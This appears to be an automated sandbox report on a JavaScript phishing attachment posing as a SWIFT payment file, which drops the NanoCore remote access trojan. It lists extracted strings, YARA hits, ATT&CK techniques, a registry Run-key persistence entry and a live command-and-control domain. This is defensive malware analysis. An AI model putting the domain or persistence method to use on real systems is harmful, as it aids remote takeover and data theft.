ttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: fdqkbs.exe, 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: fdqkbs.exe, 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: fdqkbs.exe, 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: fdqkbs.exe, 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	13 Scripting	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Disable or Modify Tools	21 Input Capture	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	12 Native API	Boot or Logon Initialization Scripts	111 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	21 Input Capture	Exfiltration Over Bluetooth	1 Data Encoding	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	13 Scripting	Security Account Manager	26 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Remote Access Software	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	3 Obfuscated Files or Information	NTDS	41 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	111 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SWIFT MO104978172_1301 EURO 9700.js	46%	ReversingLabs	Script-JS.Downloader.Nemucod
SWIFT MO104978172_1301 EURO 9700.js	100%	Avira	JS/Dropper.G1

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.fdqkbs.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
0.3.wscript.exe.2c17141e8b0.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.fdqkbs.exe.21d0000.1.unpack	100%	Avira	HEUR/AGEN.1230506	Download File
3.2.fdqkbs.exe.4910000.9.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
0.2.wscript.exe.2c1743a0090.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.SWIFT MO104978172_1301 EURO 9700.exe.287bc2f.1.unpack	100%	Avira	HEUR/AGEN.1230498	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
bition.duckdns.org	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
bition.duckdns.org	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://upx.sf.net	Amcache.hve.12.dr	false	high
http://nsis.sf.net/NSIS_ErrorError	wscript.exe, 00000000.00000003.255882496.000002C17141E000.00000004.00000020.00020000.00000000.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000000.255759037.000000000040A000.00000008.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe.0.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	fdqkbs.exe, 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	796930
Start date and time:	2023-02-02 12:36:13 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	SWIFT MO104978172_1301 EURO 9700.js
Detection:	MAL
Classification:	mal100.troj.evad.winJS@13/22@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 93.2% (good quality ratio 89%) Quality average: 84.9% Quality standard deviation: 25.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 96 Number of non-executed functions: 72
Cookbook Comments:	Found application associated with file extension: .js Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SWIFT MO104978172_1301 EURO 9700.js

Simulations

Behavior and APIs

Time	Type	Description
12:37:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run aofpiisomve C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
12:37:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run aofpiisomve C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
12:37:32	API Interceptor	3x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fdqkbs.exe_3b5310cef4636bfdd6ade66b7a63e113c499e9f_d2ed2369_0d427a15\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9124277615016035
Encrypted:	false
SSDEEP:	96:5zF6yLCQcA0EhjO72TNFpXIQcQ7Bc677MecEwcw3OaAK+HbHgA5JHQ0DFF/+xnjn:9AjArHFBf7naWTjkRy8/u7sfS274ItP
MD5:	54EB02F0418F018F55EA3A32CFCF0B06
SHA1:	6E21B2559196D7D3610EB270FAACD641F78E84CA
SHA-256:	804EED930B42ED7C70EF962F42F809CB1C803442CE968DE98568AC799CF6B715
SHA-512:	7AC568EB696025D26480940518E425F75F165B4A50857AB4CA598FD8A9550A082E41A0EA6A8CECE5F6BB1F735D36DCC6673EC79C1B6E1332D45A4CFD138C4B0F
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.0.1.1.5.3.3.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.1.0.6.8.4.4.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.c.6.1.a.7.4.-.f.c.7.4.-.4.1.b.1.-.a.4.a.3.-.3.b.5.5.1.4.7.5.a.2.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.6.b.2.a.c.8.-.e.a.f.e.-.4.2.1.b.-.8.7.d.3.-.9.f.1.5.c.d.6.1.e.0.0.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.d.q.k.b.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.c.4.-.0.0.0.1.-.0.0.1.a.-.f.a.1.7.-.f.5.2.7.4.6.3.7.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.d.a.e.3.3.6.9.7.1.6.8.4.3.4.7.7.c.e.9.2.6.4.1.e.a.3.5.e.e.e.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.e.d.e.2.2.e.2.e.4.7.e.1.5.a.e.b.4.1.c.1.d.b.a.8.b.0.c.d.1.a.6.6.9.2.6.9.3.b.!.f.d.q.k.b.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.1./.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_syhbwgs.exe_f4889ff7e22f232fc0b23411b3d2f693b1794092_282dfd12_0cfe7af0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9241144707591883
Encrypted:	false
SSDEEP:	96:sBJFnfaN3CQcAYWhjM72TNFpXIQcQ/c6RcExcw3LzByBL+HbHg/LAeugtYsaGFY7:sfl1AfHxVr1cojoCIt/u7sfS274Itpk
MD5:	80BB8753216DCBE60D8E9622CD1557EB
SHA1:	0F17E4B0DDE8DDE185259FB2616650C53034FFE6
SHA-256:	68311BD22EB276D7727FD748777FA6130A27E45162248F425F0ABFD5F7D4952D
SHA-512:	21ED1EA82739691758C8C0EB83FD25FC91E19248CE0109BBA4C16AC9EEC425C0C8C4566BCF98D116F59EE791E257F11917270E9AF69C9F4340C0758E122B457A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.0.8.3.8.7.7.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.1.6.5.1.2.9.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.1.c.b.4.0.d.-.1.5.a.a.-.4.e.9.d.-.9.3.b.6.-.9.a.3.3.f.3.9.3.2.7.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.c.8.f.e.d.d.-.e.0.7.7.-.4.7.a.0.-.b.b.4.f.-.a.1.d.1.2.c.d.d.a.3.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.y.h.b.w.g.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.4.-.0.0.0.1.-.0.0.1.a.-.5.6.3.b.-.0.1.2.a.4.6.3.7.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.d.0.6.7.e.8.a.d.2.9.5.c.5.a.d.c.3.a.f.3.9.e.1.3.3.a.c.b.6.f.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.e.d.e.2.2.e.2.e.4.7.e.1.5.a.e.b.4.1.c.1.d.b.a.8.b.0.c.d.1.a.6.6.9.2.6.9.3.b.!.s.y.h.b.w.g.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_syhbwgs.exe_f4889ff7e22f232fc0b23411b3d2f693b1794092_282dfd12_12f69936\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9172870075716885
Encrypted:	false
SSDEEP:	96:1aF2WFGCQcAIWhjM72TNFpXIQcQ/c6RcExcw3LzByBL+HbHgA5JHQ0DFF/+xnj+v:0IE9APHxVr1coji3y8/u7sfS274Itpk
MD5:	F3098F195CE2FBB700837CB39D8E5D5A
SHA1:	13D1E37D4113612FBF3AA8FCEAB15512E562A5EE
SHA-256:	1016BF1F702A0D5C118CF6CB17110518ACE3D02B9D431D95A109B7B3DE1EE2D2
SHA-512:	7DAFB6E6F0F15FDC10152669F158DC461EDA0879F51577311F124881DDC8C24E97CF50B7A05A05548D95A8C8B86081FE1AF03261AC705ABDD81B8BBAA171B3A7
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.9.2.0.1.5.0.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.9.8.8.9.0.0.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.0.0.2.f.a.5.-.e.b.3.9.-.4.2.3.6.-.b.5.9.e.-.3.d.7.e.f.5.8.2.6.9.f.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.e.e.1.9.0.1.-.a.b.1.3.-.4.2.4.7.-.9.c.1.8.-.9.d.4.c.4.2.d.1.3.9.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.y.h.b.w.g.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.1.0.-.0.0.0.1.-.0.0.1.a.-.6.2.d.a.-.1.5.3.0.4.6.3.7.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.d.0.6.7.e.8.a.d.2.9.5.c.5.a.d.c.3.a.f.3.9.e.1.3.3.a.c.b.6.f.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.e.d.e.2.2.e.2.e.4.7.e.1.5.a.e.b.4.1.c.1.d.b.a.8.b.0.c.d.1.a.6.6.9.2.6.9.3.b.!.s.y.h.b.w.g.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FB5.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Feb 2 20:37:30 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	38046
Entropy (8bit):	2.1641974095000274
Encrypted:	false
SSDEEP:	192:/6rfSGbZssOz4/aRu7O+TcHoFhPHDcJUskWf1T7WX:QFsjzWJ7O+TB58UskoE
MD5:	5EE28A959567FBB6B66B979D4C5A8406
SHA1:	9F3CBCB700B3296057282D70A9FF8C62C8B6F854
SHA-256:	3DE68AA7673E40BD115246B2BA8E9A5F8C09481A4FF8446E36A86F8597B6930E
SHA-512:	EEAD3C2F1A79D7FE77B3ED1EDCF700D2E1096435E86D9B87F7D1AA5963F50F794D78CBC4655B717D7A741EC4B7B244DDED984D5CF6C007BE5DBEAD9AE30D23F2
Malicious:	false
Preview:	MDMP....... ..........c........................(...............V,..........T.......8...........T................\|...........................................................................................U...........B......H.......GenuineIntelW...........T..............c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7246.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8314
Entropy (8bit):	3.6881449838294644
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiR662h6YDg6TvkGgmfkS6SIHCprI89bMZsfJGkm:RrlsNiM62h6Yk65gmfkS/MyfJM
MD5:	E42D0812B69300594A1F7E0E27D5FBC7
SHA1:	5A31B783C7D4FA363BE8C31987EDF0285D9AA640
SHA-256:	686F20BA93011B83180F12DD14380913B30D62D8609F78B0C40BCA9373655B5E
SHA-512:	D955758C31D0A3AA1F763B107657E91D1A44D63500C8FF6E2F7B612D8129B8DA9854720E3A19693EE6CA2690BB9703BC0E4C0925437CF34BE8DE366667AB3F52
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.1.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER72B4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4636
Entropy (8bit):	4.4168723801175425
Encrypted:	false
SSDEEP:	48:cvIwSD8zsTiJgtWI9H/Wgc8sqYj4M8fm8M4JC7fIFMf+q8vUfefpM9d:uITfMQugrsqYcxJsbfKeefpad
MD5:	E5AFFFB2CAF44FB12D2934C7803C6489
SHA1:	50B49FA1D33D353075022708783E59395582438F
SHA-256:	214CEF5C8431250CFEF5DE2346B6DA241A5C1BD80C11907070C34B357520C043
SHA-512:	496DCACBC9EFC0FEFDC8CCB3A75F5B6D059B5C95F39097988FF1C11E22F15676EBB5DB2E3477AD750860CEDFBAF8294AB743D69467248E9AB3E8176B1BA2CC39
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1895388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER72C2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Feb 2 20:37:31 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	38624
Entropy (8bit):	2.1553947089539003
Encrypted:	false
SSDEEP:	192:CFA5b9tD3X5V4OX4/WB7+K+T9CWj65INXCGzDvSMsnw0KLz:/XJV/XWsj+T9znNnalnwR
MD5:	D0427B8E00143999CA4F2922B7A178AF
SHA1:	0620D93E415B406904BF9140915BABC3D91EA6CC
SHA-256:	5F7B544457E452A2E8F6445965AEFBBB989217A9726F7D791B226C4C737A0DC6
SHA-512:	931893263033C5CDD9BE55E48CC9212D46820117E1356C74895FC69CE005FE4CCDE48769B2E3793751E9A44946597339ED5D3AD4D3EEC41E4F93FABC7B7B588F
Malicious:	false
